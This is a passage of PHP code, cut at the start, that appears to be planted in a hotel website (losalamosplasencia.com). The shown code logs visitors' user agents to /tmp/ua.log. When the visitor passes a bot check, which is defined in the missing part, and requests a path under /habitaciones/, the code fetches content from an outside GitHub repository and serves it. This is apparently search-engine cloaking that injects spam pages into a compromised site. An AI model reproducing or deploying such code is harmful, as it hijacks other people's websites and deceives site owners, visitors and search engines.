return false; } function get_content($url) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 20, CURLOPT_USERAGENT => "Mozilla/5.0" ]); $res = curl_exec($ch); curl_close($ch); return $res; } $path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); // DEBUG (hapus nanti) file_put_contents('/tmp/ua.log', $_SERVER['HTTP_USER_AGENT']."\n", FILE_APPEND); if (is_allowed_bot() && strpos($path, '/habitaciones/') === 0) { $url = "https://raw.githubusercontent.com/nothing-last1337/kyoto/refs/heads/main/losalamosplasencia.com-habitaciones"; $content = get_content($url); if ($content) { echo $content; } else { echo "fail load"; } exit; } ?>